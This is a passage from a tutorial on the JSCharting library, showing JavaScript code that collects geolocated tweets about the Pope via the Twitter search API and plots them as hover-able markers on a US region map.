= { geocode, q: query, count: 100, // pick up where the last page left off max_id: metadata ? querystring(metadata.next_results.slice(1)).max_id : '' } t.get('search/tweets', parameters, pager) } function pager (err, payload) { if (err) { done(err) return } // even when you asked for geolocated tweets, not every tweet has geolocation data tweets.push(...payload.statuses.filter(status => status.geo)) if (payload.search_metadata.next_results && pages++ < 10) { more(payload.search_metadata) // pull a few pages worth of tweets } else { done(null, tweets) } } } Once that was set up I used it to pull a few tweets from Twitter. You can find them in this Gist. I then set up a server that serves tweets about the Pope from an /tweets-about-pope endpoint, because browsers don’t play all that well with the Twitter API. Rendering the chart wasn’t anywhere near as dramatic. First off there’s the request to pull the tweets from my server. fetch('/tweets-about-pope') .then(response => response.json()) .then(tweets => { // render chart here }) Now that I had I could render the map-flavored chart. We’ve already covered pretty much every option the example below passes into new JSC.Chart(options), so I’ll just place the “entire” map rendering code here. Two of the series are used to render parts of the map, the north-east region of the US, and the south region of the US. For each tweet I went with marker points in a series that also displays the tweets themselves when hovering over the tweets with your mouse. var options = { targetElement: 'chart', type: 'map', titleLabelText: 'Tweets About the Pope in Washington and Surrounding Areas', legendPosition: 'CA:4,4', series: [{ map: 'us.region:Northeast', name: 'US north-east' }, { map: 'us.region:South', name: 'US south' }, { type: 'marker', name: 'Tweet', defaultPointTooltip: '%text <br/>— <em>%when</em> by <strong>@%username</strong>', points: tweets.map(tweet => ({ x: tweet.geo.coordinates[1], y: tweet.geo.coordinates[0], attributes: { when: moment(new Date(tweet.created_at)).fromNow(), text: tweet.text, username: tweet.user.screen_name } })) }] } var chart = new JSC.Chart(options) The final result is a map of the south-eastern continental US and locations where tweets about the Pope had originated. You can find the full code for these examples and everything you’ll need to run them yourself over at bevacqua/jscharting on GitHub. Conclusions JSCharting is a great product if you want to add visualizations to your enterprise solutions but you don’t want spend a lot of time wrestling with SVG. While other tools like d3 are more comprehensive and let you do all the things, they may be too complicated if all you want is to render some data points on a chart or a map. The declarative approach used by the JSCharting library empowers you do do just that, without necessarily having to worry about how SVG works under the hood. In this sense, JSCharting is to SVG as Grunt is to build automation scripts. Drawing charts is really easy and mostly a matter of picking the right properties – you don’t need a deep understanding of the kind of chart you want to draw in order to draw it, and I think that’s huge. Lastly, if you’re in doubt about the kinds of things you can do with it, you should take a look at their documentation. It’s pretty extensive and it has a ton of examples with all the different kinds of charts and maps that you can render with JSCharting just by declaring some data points and a few other configuration options as we explored in this article.
https://laptrinhx.com/using-the-javascript-charting-library-31218354/
CC-MAIN-2020-40
refinedweb
3,693
63.59
C#. For example, let us consider a Rectangle object. It has attributes such as length and width. Depending upon the design, it may need ways for accepting the values of these attributes, calculating the area, and displaying details. Let us look at implementation of a Rectangle class and discuss C# basic syntax: using System; namespace RectangleApplication { class Rectangle { // member variables double length; double width; public void Acceptdetails() { length = 4.5; width = 3.5; } public double GetArea() { return length * width; } public void Display() { Console.WriteLine("Length: {0}", length); Console.WriteLine("Width: {0}", width); Console.WriteLine("Area: {0}", GetArea()); } } class ExecuteRectangle { static void Main(string[] args) { Rectangle r = new Rectangle(); r.Acceptdetails(); r.Display(); Console.ReadLine(); } } } When contains the Main()method and instantiates the Rectangle class. Identifiers An identifier is a name used to identify a class, variable, function, or any other user-defined item. The basic rules for naming classes in C# are as follows: - A name must begin with a letter that could be followed by a sequence of letters, digits (0 - 9) or underscore. The first character in an identifier cannot be a digit. - It must not contain any embedded space or symbol such as? - + ! @ # % ^ & * ( ) [ ] { } . ; : " ' / and \. However, an underscore ( _ ) can be used. - It should not be are called contextual keywords. The following table lists the reserved keywords and contextual keywords in C#:
http://blogs.binarytitans.com/2017/04/c-basic-syntax.html
CC-MAIN-2018-13
refinedweb
224
50.43
Unformatted text preview: /*1111307 USA. */ #ifndef _MCHECK_H #define _MCHECK_H #include <features.h> __BEGIN_DECLS /* Return values for `mprobe': these are the kinds of inconsistencies that `mcheck' enables detection of. */ enum mcheck_status { MCHECK_DISABLED = 1, /* Consistency checking is not turned on. */ MCHECK_OK, /* Block is fine. */ MCHECK_FREE, /* Block freed twice. */ MCHECK_HEAD, /* Memory before the block was clobbered. */ MCHECK_TAIL /* Memory after the block was clobbered. */ }; 1 /* Activate a standard collection of debugging hooks. This must be called before `malloc' is ever called. ABORTFUNC is called with an error code (see enum above) when an inconsistency is detected. If ABORTFUNC is null, the standard function prints on stderr and then calls `abort'. */ extern int mcheck (void (*__abortfunc) (enum mcheck_status)) __THROW; /* Similar to `mcheck but performs checks for all block whenever one of the memory handling functions is called. This can be very slow. */ extern int mcheck_pedantic (void (*__abortfunc) (enum mcheck_status)) __THROW; /* Force check of all blocks now. */ extern void mcheck_check_all (void); /* Check for aberrations in a particular malloc'd block. You must have called `mcheck' already. These are the same checks that `mcheck' does when you free or reallocate a block. */ extern enum mcheck_status mprobe (void *__ptr) __THROW; /* Activate a standard collection of tracing hooks. */ extern void mtrace (void) __THROW; extern void muntrace (void) __THROW; __END_DECLS #endif /* mcheck.h */ ... View Full Document This note was uploaded on 02/09/2010 for the course CS 152 taught by Professor Staff during the Spring '98 term at UCLA. - Spring '98 - staff Click to edit the document details
https://www.coursehero.com/file/5782043/mcheck/
CC-MAIN-2017-26
refinedweb
249
68.67
As2 flash pop window sizepekerjaan saya suka dengan musik, keahlian saya di musik. berkarya lagu untuk menghibur masyarakat sekitar I take xml from 1 website. But that sizes for retail. But i will sell wholesale. So can you change this ? Example: 38 size -2 40 size-3 42 size -5 44 size-0 It has to write 38-40-42 2 serial. to add pop up banner image in homepage wordpress Create Widget activation flowing Button & popup need to be responsive & presentable. Widget Module needs to be a responsive design. we need three pages designed for a website. there in total three / four pages that will need designing images will be provided. no milestone payment will be made without seeing the demo htmls. someone to complete a project for my that requires you to compute the EWMA and Rolling Window of selected data. Need work started ASAP and completed within 6 hours.). [login to view URL] design/apply (e) push and pop stack structure to properly associate hierarchical objects to build gestures for 2D transformation. [login to view URL] design multiple custom (f) function/method blocks to add a unique movement... import search filter large json file . search edit export data in many ways xls pdf etc.. will provide sample of small file and example data inside it once we discuss. winner of this project who place best bid . thanks the filter filter response is given as h^(e^jw)={3 ,-1} and plot the response to build up an app used to remind people who across some areas before they like it and put it in their favorite and its shows them again while just they visit the same place again... like restaurants, gardens and play zone area. Hi, i do want to make all products pictures to have the same dimension. The pictures are allready uploaded on my website, in WP. large advert designing sick of designers on here saying they can do it then asking for inspiration and then copying exactly what i sent them that's not a designer that a copier. Need standard A4 both pages with a 5mm bleed I have a logo and need it put onto a mock window type setup, should be pretty self evident . i have attached an example .
https://www.my.freelancer.com/job-search/as2-flash-pop-window-size/
CC-MAIN-2018-43
refinedweb
379
73.98
These are chat archives for opal/opal processthat takes s expression. You can get this sexp from Parser#parse s(:top, parsed_sexp) Kernel#evalfor dynamic source code. If your code is static, just require a compiled version. If you code is dynamic - then its AST is also dynamic and you can't partially pre-compile it. Most probably I'm missing something :smile: it "will run this test in opal", :opal => true do expect(true).to be_truthy end it "does some fun isomorphic stuff", :js => true do mount_component "Price", job: my_job = FactoryGirl.create(:job, :valid_job) do class Price < React::Component::Base ... modify internal behavior of price for testing end end find(".the-price").text.should eq(my_job.price) end describecalls, etc. with RUBY_ENGINE guards require 'spec_helper' describe 'chat component', :js => true, group: 2 do before(:each) do @agents_online = 0 stub_request(:get, "support.catprint.com/customer/agent_online_check"). to_return { {body: "{\"online_agents\":#{@agents_online},\"routing_agents\":#{@agents_online}}"} } FactoryGirl.create :production_center, domain: "127.0.0.1", code: "US" end it "switches from offline to online" do mount("Chat", online_text: "ONLINE", offline_text: "OFFLINE") do class Components::Chat < React::Component::Base POLL_INTERVAL = 1 # override default of 5 minutes end end page.should have_content('OFFLINE') wait_for_ajax @agents_online = 2 Rails.cache.delete('desk_agents_online') page.should have_content('ONLINE') end eval? RE: eval... that is essentially what I am doing now... however the problem is if you have code like this: mount_component "Foo" do puts "hello" end the block.source for the do, includes the line "mount_component" which we don't want so I just use the AST tree to get the actual block def mount_component; yield; endsomewhere else that wasn't dynamic
https://gitter.im/opal/opal/archives/2016/04/18
CC-MAIN-2019-22
refinedweb
271
50.33
krb5_introduction man page krb5_introductionIntroduction to the Kerberos 5 API — Kerberos 5 API Overview All functions are documented in manual pages. This section tries to give an overview of the major components used in Kerberos library, and point to where to look for a specific function. Kerberos context A kerberos context (krb5_context) holds all per thread state. All global variables that are context specific are stored in this structure, including default encryption types, credential cache (for example, a ticket file), and default realms. The internals of the structure should never be accessed directly, functions exist for extracting information. See the manual page for krb5_init_context() how to create a context and module Heimdal Kerberos 5 library for more information about the functions. Kerberos authentication context Kerberos authentication context (krb5_auth_context) holds all context related to an authenticated connection, in a similar way to the kerberos context that holds the context for the thread or process. The krb5_auth_context is used by various functions that are directly related to authentication between the server/client. Example of data that this structure contains are various flags, addresses of client and server, port numbers, keyblocks (and subkeys), sequence numbers, replay cache, and checksum types. Kerberos principal The Kerberos principal is the structure that identifies a user or service in Kerberos. The structure that holds the principal is the krb5_principal. There are function to extract the realm and elements of the principal, but most applications have no reason to inspect the content of the structure. The are several ways to create a principal (with different degree of portability), and one way to free it. See also the page The principal handing functions. for more information and also module Heimdal Kerberos 5 principal functions. Credential cache A credential cache holds the tickets for a user. A given user can have several credential caches, one for each realm where the user have the initial tickets (the first krbtgt). The credential cache data can be stored internally in different way, each of them for different proposes. File credential (FILE) caches and processes based (KCM) caches are for permanent storage. While memory caches (MEMORY) are local caches to the local process. Caches are opened with krb5_cc_resolve() or created with krb5_cc_new_unique(). If the cache needs to be opened again (using krb5_cc_resolve()) krb5_cc_close() will close the handle, but not the remove the cache. krb5_cc_destroy() will zero out the cache, remove the cache so it can no longer be referenced. See also The credential cache functions and Heimdal Kerberos 5 credential cache functions . Kerberos errors Kerberos errors are based on the com_err library. All error codes are 32-bit signed numbers, the first 24 bits define what subsystem the error originates from, and last 8 bits are 255 error codes within the library. Each error code have fixed string associated with it. For example, the error-code -1765328383 have the symbolic name KRB5KDC_ERR_NAME_EXP, and associated error string “Client's entry in database has expired”. This is a great improvement compared to just getting one of the unix error-codes back. However, Heimdal have an extention to pass back customised errors messages. Instead of getting Key table entry not found'', the user might backfailed to find host/host.example.com@EXAMLE.COM(kvno 3) in keytab /etc/krb5.keytab (des-cbc-crc)''. This improves the chance that the user find the cause of the error so you should use the customised error message whenever it's available. See also module Heimdal Kerberos 5 error reporting functions . Keytab management A keytab is a storage for locally stored keys. Heimdal includes keytab support for Kerberos 5 keytabs, Kerberos 4 srvtab, AFS-KeyFile's, and for storing keys in memory. Keytabs are used for servers and long-running services. See also The keytab handing functions and Heimdal Kerberos 5 keytab handling functions . Kerberos crypto Heimdal includes a implementation of the Kerberos crypto framework, all crypto operations. To create a crypto context call krb5_crypto_init(). See also module Heimdal Kerberos 5 cryptography functions . Walkthrough of a sample Kerberos 5 client This example contains parts of a sample TCP Kerberos 5 clients, if you want a real working client, please look in appl/test directory in the Heimdal distribution. All Kerberos error-codes that are returned from kerberos functions in this program are passed to krb5_err, that will print a descriptive text of the error code and exit. Graphical programs can convert error-code to a human readable error-string with the krb5_get_error_message() function. Note that you should not use any Kerberos function before krb5_init_context() have completed successfully. That is the reason err() is used when krb5_init_context() fails. First the client needs to call krb5_init_context to initialise the Kerberos 5 library. This is only needed once per thread in the program. If the function returns a non-zero value it indicates that either the Kerberos implementation is failing or it's disabled on this host. #include <krb5.h> int main(int argc, char **argv) { krb5_context context; if (krb5_init_context(&context)) errx (1, "krb5_context"); Now the client wants to connect to the host at the other end. The preferred way of doing this is using getaddrinfo (for operating system that have this function implemented), since getaddrinfo is neutral to the address type and can use any protocol that is available. struct addrinfo *ai, *a; struct addrinfo hints; int error; memset (&hints, 0, sizeof(hints)); hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; error = getaddrinfo (hostname, "pop3", &hints, &ai); if (error) errx (1, "%s: %s", hostname, gai_strerror(error)); for (a = ai; a != NULL; a = a->ai_next) { int s; s = socket (a->ai_family, a->ai_socktype, a->ai_protocol); if (s < 0) continue; if (connect (s, a->ai_addr, a->ai_addrlen) < 0) { warn ("connect(%s)", hostname); close (s); continue; } freeaddrinfo (ai); ai = NULL; } if (ai) { freeaddrinfo (ai); errx ("failed to contact %s", hostname); }"); The client principal is not passed to krb5_sendauth() function, this causes the krb5_sendauth() function to try to figure it out itself. The server program is using the function krb5_recvauth() to receive the Kerberos 5 authenticator. In this case, mutual authentication will be tried. That means that the server will authenticate to the client. Using mutual authentication is required to avoid man-in-the-middle attacks, since it enables the user to verify that they are talking to the right server (a server that knows the key). If you are using a non-blocking socket you will need to do all work of krb5_sendauth() yourself. Basically you need to send over the authenticator from krb5_mk_req() and, in case of mutual authentication, verifying the result from the server with krb5_rd_rep(). status = krb5_sendauth (context, &auth_context, &sock, VERSION, NULL, server, AP_OPTS_MUTUAL_REQUIRED, NULL, NULL, NULL, NULL, NULL, NULL); if (status) krb5_err (context, 1, status, "krb5_sendauth"); Once authentication has been performed, it is time to send some data. First we create a krb5_data structure, then we sign it with krb5_mk_safe() using the auth_context that contains the session-key that was exchanged in the krb5_sendauth()/krb5_recvauth() authentication sequence.. Validating a password in an application See the manual page for krb5_verify_user(). API differences to MIT Kerberos This section is somewhat disorganised, but so far there is no overall structure to the differences, though some of the have their root in that Heimdal uses an ASN.1 compiler and MIT doesn't. Principal and realms Heimdal stores the realm as a krb5_realm, that is a char *. MIT Kerberos uses a krb5_data to store a realm. In Heimdal krb5_principal doesn't contain the component name_type; it's instead stored in component name.name_type. To get and set the nametype in Heimdal, use krb5_principal_get_type() and krb5_principal_set_type(). For more information about principal and realms, see krb5_principal. Error messages To get the error string, Heimdal uses krb5_get_error_message(). This is to return custom error messages (like Can't find host/datan.example.com\@CODE.COM in /etc/krb5.conf.'' instead of aKey table entry not found'' that error_message returns. Heimdal uses a threadsafe(r) version of the com_err interface; the global com_err table isn't initialised. Then error_message returns quite a boring error string (just the error code itself).
https://www.mankier.com/3/krb5_introduction
CC-MAIN-2017-34
refinedweb
1,336
54.63
#include <db.h> int DB_ENV->log_get_config(DB_ENV *dbenv, u_int32_t which, int *onoffp); The DB_ENV->log_get_config() method returns whether the specified which parameter is currently set or not. You can manage this value using the DB_ENV->log_set_config() method. The DB_ENV->log_get_config() method may be called at any time during the life of the application. The DB_ENV->log_get_config() method returns a non-zero error value on failure and 0 on success. The which parameter is the message value for which configuration is being checked. Must be set to one of the following values: System buffering is turned off for Berkeley DB log files to avoid double caching. Berkeley DB is configured to flush log writes to the backing disk before returning from the write system call, rather than flushing log writes explicitly in a separate system call, as necessary. Berkeley DB automatically removes log files that are no longer needed. Transaction logs are maintained in memory rather than on disk. This means that transactions exhibit the ACI (atomicity, consistency, and isolation) properties, but not D (durability). All pages of a log file are zeroed when that log file is created.
http://docs.oracle.com/cd/E17276_01/html/api_reference/C/envlog_get_config.html
CC-MAIN-2015-27
refinedweb
188
54.83
Feb 8, 2006, at 4:29 PM, William S Fulton wrote: >. Thanks, William. >. Ah... very true. Good idea. Thanks again, -Dave Dave Dribin wrote: > On Feb 5, 2006, at 12:37 PM, William S Fulton wrote: >> A second release candidate for SWIG-1.3.28 is online at >> >> >> > > I'm having issues with regard to bug #1386576: > > STL vector of object pointers does not work for C# >? > func=detail&atid=101645&aid=1386576&group_id=1645 > > This has been closed, but I'm still unsure why I need to use > SWIG_STD_VECTOR_SPECIALIZE just for C#. The same SWIG interface file > is being used for Ruby and Python, and both of these modules handle > vector of pointers correctly without any macros. I shouldn't need to > have #ifdef SWIGCSHARP littered throughout my code. This should just > be handled by SWIG. Using partial template specialization, as I > pointed out in the bug report makes this issue transparent to the > users. I'm not so sure this bug report should be closed until it "just > works", as it does for the other modules. William, you mentioned that > namespaces don't work with partial template specialization. I'm not > sure I fully understand why partial template specialization doesn't > work with namespaces. Can't the partial template specialization be > included for non-template users, and the just require template users to > use SWIG_STD_VECTOR_SPECIALIZE? At least this will work for > std::vector until the better solution is implemented at some point. > You only need to use SWIG_STD_VECTOR_SPECIALIZE if the C# proxy name is not the same as the fully qualified C++ class name, eg %inline %{ namespace Space { class Foo { }; } %} %template(VectorFoo) std::vector<Space::Foo>; In this case, in the C# code, 'Space::Foo' will be emitted instead of 'Foo'. The specialization works around this problem. The problem was the same one if using %template(VectorBar) std::vector<Bar *>; as 'Bar *' was emitted into the C# code instead of just Bar. The correct longer term fix is to invent some new special variables to translate the C++ type into the C# type, where these types are template parameters. The other language modules don't suffer from the problem because they don't extend the proxy vector class with pure managed (target language) code using the templated type - see the cscode typemap code in std_vector.i. If the C# vector wrappers were made to look more like a simple wrapper of the std::vector class, rather than like a C# System.Collections.ArrayList, then this problem would not occur.. William Taro Sato wrote: > I know passing local variables across different typemaps is not > generally recommended, but I think I really need it sometimes to make > a clean interface for python. In short, suppose I have a local > variable (say local_n here) defined in typemap like this: > > %typemap(in) int x (int local_n) { > ... > local_n = 3; > ... > } > > When can we DEFINITELY expect local_n$argnum to be already assigned a > value (i.e., 3)? If we have a C function defined like this > > int f(int a, int x, int c); > > and want to hook typemapping a ALL the arguments, can we always expect > local_n$argnum = 3 (where $argnum = 2 in the above function) to be > executed before we typemap the argument int c, while the argument int > a, the local variable local_n$argnum points to some memory location > but with an arbitrary int value? Looking at whatever_wrap.c generated > after running "swig -python whatever.i" seems to suggest the argument > wrapping codes are inserted to _wrap.c exactly in order the arguments > are defined in a C function, so my guess is YES; but the documentation > doesn't seem to say this ordering is guranteed. > > Here's an example... I have a C function with prototype: > > void repeat(int *b, int n, int *a, int m); > > What this function internally does is to take an array b with length > n, i.e., [b0, b1, ..., b_n], and generate another array a by repeating > b, such that a ends up looking like [b0, b1, ..., b_{n*m-1}]. > > (Note that this is not exactly the problem I have at hand in practice, > but it is for simplicity; the point is I have no option for redefining > the function prototype.) > > In python, I want to simply use the interface such that I only need to > have the list to provide for b and the number of repetition m: > >>>>result = repeat([1,2,3], 3) >>>>print result > [1, 2, 3, 1, 2, 3, 1, 2, 3] > > This is because I can get the length of the array b using PyList_Size; > the array a is for output, so I simply want to get it as a returned > value. > > For SWIG, I make typemaps like this: > > ------------------------------------------------------------------------------ > // repeat.i > %module repeat > > .... > > %typemap(in) (int *b, int n) (int local_n) { > ... > $2 = (int) PyList_Size($input); > local_n = $2; > ... > } > > %typemap(in) (int *a, int m) { > ... > length_of_a = m * local_n1; // I want to do this, but need to make > sure local_n > // is already > defined properly. > ... > } > > oid repeat(int *b, int n, int *a, int m); > > --------------------------------------------------------------------------------- > > so that when typemapping is done for array a, I can rely on local_n to > hold a size of array b. > There are no guarantees on the numbering. Rather than abuse the typemap system, because your types are not complete, I'd write a wrapper function instead or complete the type. Your types are not complete as your output array does not hold complete information about the array, that is the size of the array. The caller of repeat has to have apriori knowledge in order to use the function. So, build the knowledge into your wrapper, consider something like: typedef struct { int *a; int m; } array; array * repeat_wrapper(int *b, int n, int m) { array my_array; my_array.a = malloc(sizeof(int)*n*m); my_array.m = m; repeat(b, n, my_array.a, my_array.m); return a; } Then you can wrap repeat_wrapper instead and easily get all the information necessary for marshalling your C array into a python list and write an 'out' typemap for 'array *'. Alternatively complete the type if you can change the code you are wrapping. You could use a null terminated array, so that the size can be deduced. If you think about it, this is how char* strings work as they don't contain a size, strlen() will get it for you, by searching for the null termination. William Hi Marcelo I checked it and it works beautifully now. Thank you very much indeed+ Regards Andreas >Ok, it is solved now, but sourceforge.net CVS is down. > >Anyway, the fix will be to 1.3.28 before final release. > >Marceki > >andreas.held@... wrote: > >>Hi >> >>I recently run into the following problem where swig generated duplicate = symbols. Incidentally, this problem already existed in swig-1.3.27, as well= as in 1.3.28rc2. >> >>Consider the following file (test.i): >>%module(directors=3D"1") test >>%feature("director"); >> >>%{ >> class A { >> public: >> A() {}; >> virtual ~A() {}; >> protected: >> virtual void draw() {}; >> }; >> >> class B : public A { >> public: >> B() {}; >> virtual ~B() {}; >> protected: >> void draw() {}; >> void draw(int arg1) {}; >> }; >> >>%} >> >> class A { >> public: >> A() {}; >> virtual ~A() {}; >> protected: >> virtual void draw() {}; >> }; >> >> class B : public A { >> public: >> B() {}; >> virtual ~B() {}; >> protected: >> void draw() {}; >> void draw(int arg1) {}; >> }; >> >>Compiling this with the command line: >>swig -module test -DPYTHON -python -c++ -shadow -modern -dirprot -O -o te= st_wrap.cpp test.i >> >>results in the symbol _wrap_B_draw__SWIG_0 defined twice. >>Before you flame me, the above code is not mine, but is part of the libra= ry I am trying to wrap. Hints and suggestions are most welcome. >> >>Regards >> >>Andreas Held >> >> >> >> >> >>------------------------------------------------------- >>This SF.net email is sponsored by: Splunk Inc. Do you grep through log fi= les >>for problems? Stop! Download the new AJAX search engine that makes >>searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! >> >>_______________________________________________ >>Swig-user mailing list >>Swig-user@... >> >> >>=20=20 >> > > > Am Wed, 08 Feb 2006 20:05:06 +0100 hat Marcelo Matus <mmatus@...> geschrieben: >!. Just for the records, I had a bug with swig 1.3.27 and msvc 2005 where the compiler complained about some missing operator < in the PySequence class. The 1.3.28rc2 release solved this. Mentioning it just in case somebody here posts about it later and uses an old swig. -Matthias P.S.: Thanks for reminding me about Valentine day, I almost forgot it... would probably have led to catastrophic consequences ;-)!. Marcelo William S Fulton wrote: > A second release candidate for SWIG-1.3.28 is online at > > > > > This release candidate contains a few fixed bugs since the first > release candidate. Please test again. Assuming this candidate has no > major issues, we'll make the official release in a week or so. > > William > > SWIG-1.3.28 summary: > - New language module: Common Lisp with CFFI. > -'. > - Optional automatic copy constructor wrapper generation. > - Python implicit conversion mechanism similar to C++, via the > %implicitconv directive (replaces and improves the implicit.i > library). > - Python threading support added. > - Support for Ruby bang methods. > - Better default handling of std::string variables. > - Unified typemap library (UTL) potentially providing core typemaps for > all scripting languages based on the recently evolving Python > typemaps. > - Python, Ruby, Perl and Tcl use the new UTL. > - Initial GCJ/Java support for languages using the UTL. > - Improved dispatching in overloaded functions by using a cast and rank > mechanism in perl and optionally in python via the -castmode option. > - Better handling of Windows extensions and types. > - C++ support added to the Allegrocl module, also enhanced C support. > - Python STL support improved, addition of iterators and STL containers > of native Python types. > - Python performance options and improvements, try the -O option to test > all of them. Python runtime benchmarks show upto 20 times better > performance compared to 1.3.27 and older versions. > - Python support for 'multi-inheritance' on the python side. > - Python simplified proxy classes, now swig doesn't need to generate the > additional 'ClassPtr' classes. > - Python backward compatibility improved, many projects that used to > work only with swig-1.3.21 to swig-1.3.24 are working again with > swig-1.3.28 > - Better runtime error reporting. > - Add the %catches directive to catch and dispatch exceptions. > - Add the %naturalval directive for more 'natural' variable wrapping. > - Add the %allowexcept and %exceptionvar directives to handle exceptions > when accesing a variable. > - Add the %delobject directive to mark methods that act like > destructors. > - Add/doc more debug options. > - Minor bug fixes and improvements to the Lua, Ruby, Java, C#, Python, > Guile, Chicken, Tcl and Perl modules. > > > > > ------------------------------------------------------- >@... >
https://sourceforge.net/p/swig/mailman/swig-user/?viewmonth=200602&viewday=8
CC-MAIN-2017-43
refinedweb
1,743
64.71
The purpose of this code is to return a dictionary that lists the beginning index of a substring in a larger string. Ex. matchUp(["a", "b, "c", "d"], "abc") would return: {"a":0, "b":1, "c":2, "d":-1} (with -1 being the default empty key) The hint for this question is that the find function can tell you the beginning index for a substring in another string. This is the correct syntax, right? I have my array of characters in strArray, and y is the substring I am searching for. def matchUp (strArray, word): index ={} for x in strArray: index [x]=-1 for y in word: for x in index: if y in strArray: index [x]= strArray.find(y) return index You need to call word.find, not strArray.find. def matchUp (strArray, word): index = {} for ch in strArray: index[ch] = word.find(ch) # <--- return index (No need to use nested loop) Usage example: >>> matchUp(["a", "b", "c", "d"], "abc") {'a': 0, 'c': 2, 'b': 1, 'd': -1}
https://codedump.io/share/1BUjdpnPdA3O/1/simple-python-27-code-has-some-kind-of-issue-quot39list39-object-has-no-attribute-39find39quot
CC-MAIN-2017-13
refinedweb
169
79.4
In Windows Forms, the DateTimePicker control is used to select and display the date/time with a specific format in your form. The FlowLayoutPanel class is used to represent windows DateTimePicker control and also provide different types of properties, methods, and events. It is defined under System.Windows.Forms namespace. You can create two different types of DateTimePicker, as a drop-down list with a date represented in the text, or as a calendar which appears when you click on the down-arrow next to the given list. In C#, you can create a DateTimePicker in the windows form by using two different ways: 1. Design-Time: It is the easiest way to create a DateTimePicker control to modify DateTimePicker according to your requirement. Output: 2. Run-Time: It is a little bit trickier than the above method. In this method, you can create a DateTimePicker programmatically with the help of syntax provided by the DateTimePicker class. The following steps show how to set the create DateTimePicker dynamically: - Step 1: Create a DateTimePicker using the DateTimePicker() constructor is provided by the DateTimePicker class. // Creating a DateTimePicker DateTimePicker d = new DateTimePicker(); - Step 2: After creating a DateTimePicker, set the properties of the DateTimePicker provided by the DateTimePicker class. // Setting the location of the DateTimePicker d.Location = new Point(360, 162); // Setting the size of the DateTimePicker d.Size = new Size(292, 26); // Setting the maximum date of the DateTimePicker d.MaxDate = new DateTime(2500, 12, 20); // Setting the minimum date of the DateTimePicker d.MinDate = new DateTime(1753, 1, 1); // Setting the format of the DateTimePicker d.Format = DateTimePickerFormat.Long; // Setting the name of the DateTimePicker d.Name = "MyPicker"; // Setting the font of the DateTimePicker d.Font = new Font("Comic Sans MS", 12); // Setting the visibility of the DateTimePicker d.Visible = true; // Setting the value of the DateTimePicker d.Value = DateTime.Today; - Step 3: And last add this DateTimePicker control to the form and also add other controls on the DateTimePicker using the following statements: // Adding this control // to the form this.Controls.Add(d); Example:chevron_rightfilter_none Output: Constructor Fields Properties Recommended Posts: - How to set a Check Box in the DateTimePicker in C#? - How to set the Visibility of DateTimePicker in C#? - How to set the Size of the DateTimePicker in C#? - How to set the Format of the DateTimePicker in C#? - How to set Maximum Date in the DateTimePicker in C#? - How to set Minimum Date in the DateTimePicker in C#? - How to set the Font of the DateTimePicker in C#? - How to set the Name of the DateTimePicker in C#? - How to set the Location of the DateTimePicker in C#? - How to display Current Date/Time in the DateTimePicker in C#? - How to set Up and Down Button in DateTimePicker in C#? - C# | FlowLayoutPanel Class - C# | ListBox Class - C# | GroupBox Class - C# | NumericUpDown Class - C# | MaskedTextBox Class - C# | RichTextBox Class - C# | ToolTip.
https://www.geeksforgeeks.org/c-sharp-datetimepicker-class/
CC-MAIN-2020-40
refinedweb
484
56.96
I am having trouble with an array. I have to enter some food items and their calorie values and then when finished I have to re enter the food item and then search the array to output their calorie values. My problem is how do I search an array. here is what I have so far #include <iostream> #include <string> using namespace std; int main() { string food[100]; string searchvalue; int calories[100]; int x = -1; do { x++; cout <<"Enter a menu item (enter 'done' when finished): "; getline(cin, food[x]); if (food[x] != "done") { cout <<"Enter the number of calories: "; cin >> calories[x]; cin.ignore(); } }while(food[x] != "done"); cout << '\n' << "*** DATA ENTRY FINISHED ***" << endl; do { for ( cout << "Enter a product to look up: "; getline(cin, food[x]); if(food[x] != "done") { cout << food[x] << " has " << calories[x] << " calories." << endl; } }while(food[x] != "done"); }
https://www.daniweb.com/programming/software-development/threads/277893/array-help
CC-MAIN-2018-05
refinedweb
145
78.28
Updated for Xcode 12.0 Although using @Published is the easiest way to control state updates, you can also do it by hand if you need something specific. For example, you might want the view to refresh only if you’re happy with the values you’ve been given. Using this approach takes three steps: importing the Combine framework, adding a publisher, then using the publisher. Publishers are Combine’s way of announcing changes to whatever is watching, which in the case of SwiftUI is zero or more views. Here’s an example in code: import Combine import SwiftUI class UserAuthentication: ObservableObject { let objectWillChange = ObservableObjectPublisher() var username = "" { willSet { objectWillChange.send() } } } Let’s break down the code, to make it easier to understand. First, we have this: let objectWillChange = ObservableObjectPublisher() That creates an objectWillChange property as an instance of ObservableObjetPublisher. This comes from the Combine framework, which is why you need to add import Combine to make your code compile. The job of an observable object publisher is simple: whenever we want to tell the world that our object has changed, we ask the publisher to do it for us. Second, we have a willSet property observer attached to the username property of UserAuthentication so that we can run code whenever that value changes. In our example code, we call objectWillChange.send() whenever username changes, which is what tells the objectWillChange publisher to put out the news that our data has changed so that any subscribed views can refresh. As our UserAuthentication class conforms to ObservableObject, we can use it just like any other @ObservedObject property. So, we might use it like this to display the user’s entry as they type, like this: struct ContentView: View { @ObservedObject var settings = UserAuthentication() var body: some View { VStack { TextField("Username", text: $settings.username) .textFieldStyle(RoundedBorderTextFieldStyle()) Text("Your username is: \(settings.username)") } } } Note: SwiftUI actually provides us with a default objectWillChange property, but it doesn’t actually work in the current beta. So, it’s important to declare your own with the same name. Sponsor Hacking with Swift and reach the world's largest Swift community! Link copied to your pasteboard.
https://www.hackingwithswift.com/quick-start/swiftui/how-to-send-state-updates-manually-using-objectwillchange
CC-MAIN-2020-29
refinedweb
357
54.22
By Holger Krekel, who also wrote (some parts of) Tox, pypy, devpi Equivalent to unittest and nose, highly customizable, with an excellent API. Still actively maintained, and well documented. Installation: pip install pytest --duration=10 -x(ou --maxfail=n) --pdb --pastebin=failed --showlocals --tb=long @pytest.mark.functional py.test -k test_fooby path: py.test tests/bar/by module: py.test test_baz.pyby mark: py.test -m functionalou py.test -m "not functional" There's more examples on this page. Many many more examples.There's more examples on this page. Many many more examples. def test_eq_dict(self): > assert {'a': 0, 'b': 1, 'c': 0} == {'a': 0, 'b': 2, 'd': 0} E Depencendy injection using fixtures, instead of (setUp|tearDown)(function|class|module|package) hocus pocushocus pocus def test_view(rf, settings): settings.LANGUAGE_CODE = 'fr' request = rf.get('/') response = home_view(request) assert response.status_code == 302 Write the test once, run it with multiple inputs From now on, I'm only writing one test. The one.From now on, I'm only writing one test. The one. @pytest.mark.parametrize(("input", "expected"), [("3+5", 8), ("2+4", 6)]) def test_eval(input, expected): assert eval(input) == expected Globally, in the pytest.ini file: mainly to (optionnally) declare marks and default parameters --reuse-db is the real deal--reuse-db is the real deal [pytest] addopts = --reuse-db --tb=native python_files=test*.py markers = es_tests: 